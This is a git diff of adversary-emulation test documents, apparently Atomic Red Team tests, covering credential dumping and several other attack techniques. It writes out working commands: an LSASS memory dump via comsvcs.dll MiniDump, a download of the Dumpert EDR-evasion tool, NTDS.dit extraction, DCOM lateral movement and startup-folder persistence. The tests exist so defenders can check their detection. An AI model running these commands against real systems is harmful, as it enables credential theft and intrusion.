-## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
+## Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
+```
+
+
+
+
+
+
+
+
+## Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
+https://github.com/outflanknl/Dumpert
+https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
+Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp.
+
+If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003\bin\Outflank-Dumpert.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+#{dumpert_exe}
+```
+
+#### Cleanup Commands:
+```cmd
+del C:\windows\temp\dumpert.dmp >nul 2> nul
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
+Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
+```
+
+
+
+
+
+
+
+## Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
@@ -433,7 +518,7 @@ Manager and administrative permissions.
-## Atomic Test #7 - Offline Credential Theft With Mimikatz
+## Atomic Test #9 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
@@ -488,7 +573,7 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
-## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
+## Atomic Test #10 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -535,7 +620,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
-## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit
+## Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -578,7 +663,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
-## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy
+## Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -652,7 +737,7 @@ mkdir #{extract_path}
-## Atomic Test #11 - GPP Passwords (findstr)
+## Atomic Test #13 - GPP Passwords (findstr)
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
**Supported Platforms:** Windows
@@ -688,7 +773,7 @@ Write-Host Joining this computer to a domain must be done manually
-## Atomic Test #12 - GPP Passwords (Get-GPPPassword)
+## Atomic Test #14 - GPP Passwords (Get-GPPPassword)
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
This test is intended to be run from a domain joined workstation, not on the Domain Controller itself.
The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.
@@ -745,7 +830,7 @@ Write-Host Joining this computer to a domain must be done manually
-## Atomic Test #13 - LSASS read with pypykatz
+## Atomic Test #15 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
@@ -804,7 +889,7 @@ pip3 install pypykatz
-## Atomic Test #14 - Registry parse with pypykatz
+## Atomic Test #16 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1015.md b/Atomic_Threat_Coverage/Triggers/T1015.md
index 0cbed15..95fc877 100644
--- a/Atomic_Threat_Coverage/Triggers/T1015.md
+++ b/Atomic_Threat_Coverage/Triggers/T1015.md
@@ -70,7 +70,7 @@ $input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
$item = $item.trim()
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f
+ reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f | Out-Null
}
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1023.md b/Atomic_Threat_Coverage/Triggers/T1023.md
index dae833d..3917672 100644
--- a/Atomic_Threat_Coverage/Triggers/T1023.md
+++ b/Atomic_Threat_Coverage/Triggers/T1023.md
@@ -13,7 +13,8 @@
## Atomic Test #1 - Shortcut Modification
This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;
-gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL
+gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL.
+Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@@ -23,16 +24,22 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| shortcut_file_path | shortcut modified and execute | path | shortcutname.url|
+| shortcut_file_path | shortcut modified and execute | path | %temp%\T1023_modified_shortcut.url|
#### Attack Commands: Run with `command_prompt`!
```cmd
-echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
+echo [InternetShortcut] > #{shortcut_file_path}
+echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
+#{shortcut_file_path}
```
+#### Cleanup Commands:
+```cmd
+del -f #{shortcut_file_path} >nul 2>&1
+```
@@ -42,7 +49,8 @@ echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #
## Atomic Test #2 - Create shortcut to cmd in startup folders
-LNK file to launch CMD placed in startup folder
+LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
+to view the new shortcut.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1028.md b/Atomic_Threat_Coverage/Triggers/T1028.md
index d77820b..43d8267 100644
--- a/Atomic_Threat_Coverage/Triggers/T1028.md
+++ b/Atomic_Threat_Coverage/Triggers/T1028.md
@@ -20,7 +20,7 @@
## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM
-Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
+Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
**Supported Platforms:** Windows
@@ -50,7 +50,7 @@ Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
-Upon successful execution, cmd will spawn calc.exe on a remote computer.
+Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
@@ -63,11 +63,11 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
| computer_name | Name of Computer | string | computer1|
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `powershell`!
-```cmd
-powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+```powershell
+[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1031.md b/Atomic_Threat_Coverage/Triggers/T1031.md
index 075da46..c7a696c 100644
--- a/Atomic_Threat_Coverage/Triggers/T1031.md
+++ b/Atomic_Threat_Coverage/Triggers/T1031.md
@@ -35,7 +35,7 @@ sc start Fax
#### Cleanup Commands:
```cmd
-sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
+sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1032.md b/Atomic_Threat_Coverage/Triggers/T1032.md
index 5fa35b0..08b6e2b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1032.md
+++ b/Atomic_Threat_Coverage/Triggers/T1032.md
@@ -35,7 +35,7 @@ Upon successful execution, powershell will make a network connection to 127.0.0.
```powershell
$server_ip = #{server_ip}
$server_port = #{server_port}
-$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
+$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
diff --git a/Atomic_Threat_Coverage/Triggers/T1035.md b/Atomic_Threat_Coverage/Triggers/T1035.md
index 574699b..0d1ec12 100644
--- a/Atomic_Threat_Coverage/Triggers/T1035.md
+++ b/Atomic_Threat_Coverage/Triggers/T1035.md
@@ -77,7 +77,7 @@ Upon successful execution, powershell will download psexec.exe and spawn calc.ex
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
+if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/Atomic_Threat_Coverage/Triggers/T1037.md b/Atomic_Threat_Coverage/Triggers/T1037.md
index 50eea1f..50139ce 100644
--- a/Atomic_Threat_Coverage/Triggers/T1037.md
+++ b/Atomic_Threat_Coverage/Triggers/T1037.md
@@ -28,7 +28,8 @@ Mac allows login and logoff hooks to be run as root whenever a specific user log
## Atomic Test #1 - Logon Scripts
-Adds a registry value to run batch script created in the C:\Windows\Temp directory.
+Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
+that can be viewed in the Registry Editor.
**Supported Platforms:** Windows
@@ -38,7 +39,7 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| script_path | Path to .bat file | String | $env:SystemRoot\Temp\art.bat|
+| script_path | Path to .bat file | String | %temp%\art.bat|
| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037-log.txt|
@@ -46,15 +47,15 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
```cmd
-echo cmd /c "#{script_command}" > #{script_path}
-REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
+echo "#{script_command}" > #{script_path}
+REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
```
#### Cleanup Commands:
```cmd
-REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
-del #{script_path} >nul 2>nul
-del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
+REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
+del #{script_path} >nul 2>&1
+del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
```
@@ -65,7 +66,8 @@ del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
## Atomic Test #2 - Scheduled Task Startup Script
-Run an exe on user logon or system startup
+Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
+the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** Windows
@@ -83,8 +85,8 @@ schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c ca
#### Cleanup Commands:
```cmd
-schtasks /delete /tn "T1037_OnLogon" /f
-schtasks /delete /tn "T1037_OnStartup" /f
+schtasks /delete /tn "T1037_OnLogon" /f >nul 2>&1
+schtasks /delete /tn "T1037_OnStartup" /f >nul 2>&1
```
@@ -129,7 +131,9 @@ Mac logon script
## Atomic Test #4 - Supicious vbs file run from startup Folder
-vbs files can be placed in and ran from the startup folder to maintain persistance
+vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World VBS!" will be displayed twice.
+Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
+folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
@@ -162,7 +166,9 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Supicious jse file run from startup Folder
jse files can be placed in and ran from the startup folder to maintain persistance.
-Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice.
+Upon execution, "T1137 Hello, World JSE!" will be displayed twice.
+Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
+folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
@@ -195,7 +201,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Supicious bat file run from startup Folder
bat files can be placed in and executed from the startup folder to maintain persistance.
-Upon execution, cmd will be run and immediately closed.
+Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
+folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1044.md b/Atomic_Threat_Coverage/Triggers/T1044.md
index 749f88c..bfdf996 100644
--- a/Atomic_Threat_Coverage/Triggers/T1044.md
+++ b/Atomic_Threat_Coverage/Triggers/T1044.md
@@ -21,9 +21,12 @@ Another variation of this technique can be performed by taking advantage of a we
## Atomic Test #1 - File System Permissions Weakness
This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing malicious file. Example; check weak file permission and then replace.
-powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and
+powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and
copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe ( replace weak permission file with malicious file )
+Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents read "T1044 Malicious file". To verify
+the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security to view the Full Control permission is enabled.
+
**Supported Platforms:** Windows
@@ -32,7 +35,8 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| weak_permission_file | check weak files permission | path | GoogleUpdate.exe|
+| weak_permission_file | check weak files permission | path | $env:TEMP\T1044_weak_permission_file.txt|
+| malicious_file | File to replace weak permission file with | path | $env:TEMP\T1044\T1044_malicious_file.txt|
#### Attack Commands: Run with `powershell`!
@@ -40,12 +44,41 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
```powershell
Get-WmiObject win32_service | select PathName
-get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl"
+Copy-Item #{malicious_file} -Destination #{weak_permission_file} -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{weak_permission_file} -Force -ErrorAction Ignore
+Remove-Item -Recurse (Split-Path #{malicious_file}) -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: A file must exist on disk at specified location (#{weak_permission_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{weak_permission_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item #{weak_permission_file} -Force | Out-Null
+Set-Content -Path #{weak_permission_file} -Value "T1044 Weak permission file"
+```
+##### Description: A file to replace the original weak_permission_file. In an attack this would be the malicious file gaining extra privileges
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{malicious_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory -Path $env:TEMP\T1044\ -Force | Out-Null
+New-Item #{malicious_file} -Force | Out-Null
+Set-Content -Path #{malicious_file} -Value "T1044 Malicious file"
```
-
-
diff --git a/Atomic_Threat_Coverage/Triggers/T1047.md b/Atomic_Threat_Coverage/Triggers/T1047.md
index c310402..b8bc021 100644
--- a/Atomic_Threat_Coverage/Triggers/T1047.md
+++ b/Atomic_Threat_Coverage/Triggers/T1047.md
@@ -154,7 +154,7 @@ wmic process call create #{process_to_execute}
#### Cleanup Commands:
```cmd
-wmic process where name='#{process_to_execute}' delete
+wmic process where name='#{process_to_execute}' delete >nul 2>&1
```
@@ -190,7 +190,7 @@ wmic /node:"#{node}" process call create #{process_to_execute}
#### Cleanup Commands:
```cmd
-wmic /node:"#{node}" process where name='#{process_to_execute}' delete
+wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1050.md b/Atomic_Threat_Coverage/Triggers/T1050.md
index 9322118..9b495cd 100644
--- a/Atomic_Threat_Coverage/Triggers/T1050.md
+++ b/Atomic_Threat_Coverage/Triggers/T1050.md
@@ -6,15 +6,15 @@ Adversaries may install a new service that can be configured to execute at start
## Atomic Tests
-- [Atomic Test #1 - Service Installation](#atomic-test-1---service-installation)
+- [Atomic Test #1 - Service Installation CMD](#atomic-test-1---service-installation-cmd)
- [Atomic Test #2 - Service Installation PowerShell](#atomic-test-2---service-installation-powershell)
-## Atomic Test #1 - Service Installation
-Installs A Local Service.
+## Atomic Test #1 - Service Installation CMD
+Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
@@ -67,7 +67,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Service Installation PowerShell
Installs A Local Service via PowerShell.
-Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will output via stdout.
+Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
**Supported Platforms:** Windows
@@ -85,7 +85,7 @@ Upon successful execution, powershell will download `AtomicService.exe` from git
```powershell
-New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" 2>&1 | Out-Null
+New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1055.md b/Atomic_Threat_Coverage/Triggers/T1055.md
index 8fc773c..6f98eef 100644
--- a/Atomic_Threat_Coverage/Triggers/T1055.md
+++ b/Atomic_Threat_Coverage/Triggers/T1055.md
@@ -27,15 +27,13 @@ Malware commonly utilizes process injection to access system resources through w
- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
-- [Atomic Test #2 - Process Injection via PowerSploit](#atomic-test-2---process-injection-via-powersploit)
+- [Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-2---shared-library-injection-via-etcldsopreload)
-- [Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-3---shared-library-injection-via-etcldsopreload)
+- [Atomic Test #3 - Shared Library Injection via LD_PRELOAD](#atomic-test-3---shared-library-injection-via-ld_preload)
-- [Atomic Test #4 - Shared Library Injection via LD_PRELOAD](#atomic-test-4---shared-library-injection-via-ld_preload)
+- [Atomic Test #4 - Process Injection via C#](#atomic-test-4---process-injection-via-c)
-- [Atomic Test #5 - Process Injection via C#](#atomic-test-5---process-injection-via-c)
-
-- [Atomic Test #6 - svchost writing a file to a UNC path](#atomic-test-6---svchost-writing-a-file-to-a-unc-path)
+- [Atomic Test #5 - svchost writing a file to a UNC path](#atomic-test-5---svchost-writing-a-file-to-a-unc-path)
@@ -43,7 +41,7 @@ Malware commonly utilizes process injection to access system resources through w
## Atomic Test #1 - Process Injection via mavinject.exe
Windows 10 Utility To Inject DLLS.
-Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
+Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
**Supported Platforms:** Windows
@@ -86,41 +84,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
-## Atomic Test #2 - Process Injection via PowerSploit
-PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
-
-Upon successful execution, powershell.exe will download `Invoke-DLLInjection.ps1` and use it to inject into the `T1055.dll` shared library file.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| dll_payload | DLL to Inject | Path | T1055.dll|
-| process_id | PID of input_arguments | Integer | (get-process spoolsv).id|
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-$mypid = #{process_id}
-Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
-This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
+## Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload
+This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload.
@@ -150,7 +115,7 @@ echo #{path_to_shared_library} > /etc/ld.so.preload
-## Atomic Test #4 - Shared Library Injection via LD_PRELOAD
+## Atomic Test #3 - Shared Library Injection via LD_PRELOAD
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.
@@ -181,7 +146,7 @@ LD_PRELOAD=#{path_to_shared_library} ls
-## Atomic Test #5 - Process Injection via C#
+## Atomic Test #4 - Process Injection via C#
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
@@ -218,9 +183,9 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
-## Atomic Test #6 - svchost writing a file to a UNC path
+## Atomic Test #5 - svchost writing a file to a UNC path
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
-Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
+Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1063.md b/Atomic_Threat_Coverage/Triggers/T1063.md
index 3720830..852b8c3 100644
--- a/Atomic_Threat_Coverage/Triggers/T1063.md
+++ b/Atomic_Threat_Coverage/Triggers/T1063.md
@@ -29,6 +29,9 @@ It's becoming more common to see macOS malware perform checks for LittleSnitch a
## Atomic Test #1 - Security Software Discovery
Methods to identify Security Software on an endpoint
+when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles
+and specific security software.
+
**Supported Platforms:** Windows
@@ -39,7 +42,7 @@ Methods to identify Security Software on an endpoint
```cmd
-netsh.exe advfirewall firewall show all profiles
+netsh.exe advfirewall show allprofiles
tasklist.exe
tasklist.exe | findstr /i virus
tasklist.exe | findstr /i cb
@@ -58,6 +61,8 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell
Methods to identify Security Software on an endpoint
+when sucessfully executed, powershell is going to processes related AV products if they are running.
+
**Supported Platforms:** Windows
@@ -84,6 +89,7 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps
Methods to identify Security Software on an endpoint
+when sucessfully executed, command shell is going to display AV software it is running( Little snitch or carbon black ).
**Supported Platforms:** Linux, macOS
@@ -110,6 +116,8 @@ ps aux | grep CbOsxSensorService
## Atomic Test #4 - Security Software Discovery - Sysmon Service
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
+when sucessfully executed, the test is going to display sysmon driver instance if it is installed.
+
**Supported Platforms:** Windows
@@ -134,6 +142,8 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #5 - Security Software Discovery - AV Discovery via WMI
Discovery of installed antivirus products via a WMI query.
+when sucessfully executed, the test is going to display installed AV software.
+
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1064.md b/Atomic_Threat_Coverage/Triggers/T1064.md
index 3c0bfaf..06dacd6 100644
--- a/Atomic_Threat_Coverage/Triggers/T1064.md
+++ b/Atomic_Threat_Coverage/Triggers/T1064.md
@@ -43,7 +43,7 @@ sh /tmp/art.sh
## Atomic Test #2 - Create and Execute Batch Script
-Creates and executes a simple batch script.
+Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again.
**Supported Platforms:** Windows
@@ -54,24 +54,36 @@ Creates and executes a simple batch script.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command to execute within script. | string | dir|
-| script_to_create | Path of script to create. | path | C:\Windows\TEMP\execute.bat|
+| script_path | Path of script to create. | path | $env:TEMP\T1064_script.bat|
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `powershell`!
-```cmd
-C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
-C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
+```powershell
+Start-Process #{script_path}
```
#### Cleanup Commands:
-```cmd
-del #{script_to_create} >nul 2>&1
+```powershell
+Remove-Item #{script_path} -Force -ErrorAction Ignore
```
+#### Dependencies: Run with `powershell`!
+##### Description: Batch file must exist on disk at specified location (#{script_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{script_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item #{script_path} -Force | Out-Null
+Set-Content -Path #{script_path} -Value "#{command_to_execute}"
+```
+
+
diff --git a/Atomic_Threat_Coverage/Triggers/T1065.md b/Atomic_Threat_Coverage/Triggers/T1065.md
index 73d8f6b..fe1a98f 100644
--- a/Atomic_Threat_Coverage/Triggers/T1065.md
+++ b/Atomic_Threat_Coverage/Triggers/T1065.md
@@ -12,7 +12,8 @@
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell
-Testing uncommonly used port utilizing PowerShell
+Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon exectuion, details about the successful
+port check will be displayed.
**Supported Platforms:** Windows
@@ -30,7 +31,7 @@ Testing uncommonly used port utilizing PowerShell
```powershell
-test-netconnection -ComputerName #{domain} -port #{port}
+Test-NetConnection -ComputerName #{domain} -port #{port}
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1069.md b/Atomic_Threat_Coverage/Triggers/T1069.md
index 32591d6..5761eab 100644
--- a/Atomic_Threat_Coverage/Triggers/T1069.md
+++ b/Atomic_Threat_Coverage/Triggers/T1069.md
@@ -60,7 +60,8 @@ groups
## Atomic Test #2 - Basic Permission Groups Discovery Windows
-Basic Permission Groups Discovery for Windows
+Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
+information will be displayed.
**Supported Platforms:** Windows
@@ -86,7 +87,8 @@ net group "domain admins" /domain
## Atomic Test #3 - Permission Groups Discovery PowerShell
-Permission Groups Discovery utilizing PowerShell
+Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
+information will be displayed.
**Supported Platforms:** Windows
@@ -116,7 +118,8 @@ get-ADPrincipalGroupMembership #{user} | select name
## Atomic Test #4 - Elevated group enumeration using net group
-Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups
+Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
+test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
